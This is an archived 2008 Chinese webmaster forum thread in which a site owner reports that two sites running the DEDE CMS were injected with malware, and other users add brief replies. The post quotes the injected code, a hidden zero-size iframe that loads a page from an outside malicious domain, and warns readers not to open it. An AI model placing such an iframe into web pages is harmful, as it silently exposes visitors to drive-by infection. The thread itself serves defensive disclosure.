落伍者站长论坛's Archiver

逍遥剑客 发表于 2008-5-12 01:42

DEDE程序是不是出了重大安全漏洞?发现两个站被挂马了

今天,一个朋友在QQ上留言说,通过我的网站点了友情链接中的一个  系统死机  两次

我查了一下,是使用DEDE系统的站被挂码了.想起来,另一个站也是使用DEDE系统的,所以去看了一眼...发现,挂的代码都是一样的!

所以,
使用DEDE系统的,去查一下吧.

可能被挂马了...

<iframe src=http://2.luobotebaqiao.info/index.htm width=0 height=0></iframe>

大家可以用FLASHGET之类的工具下载回来,查看代码.

不要打开.

因为个人对PHP并不熟悉.对DEDE也不熟悉.所以,只能是猜测......

ARP的可能性还是存在的.目前已经排除我自己电脑中了ARP病毒的可能性.两台服务器IP相差很大......难道说,两台服务器都中了同一个ARP病毒吗?也是有可能的.网关NDS欺骗?......期待结果.

dj8899 发表于 2008-5-12 05:11

*** 作者被禁止或删除 内容自动屏蔽 ***

erguo 发表于 2008-5-12 10:44

一直就有。

linkeronline 发表于 2008-5-12 10:54

难说

坏小子 发表于 2008-5-12 13:29

开放会员系统了?

yanyiwei 发表于 2008-5-12 13:33

:ohh: 功能越强大  代码漏洞就越多
肯定的

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.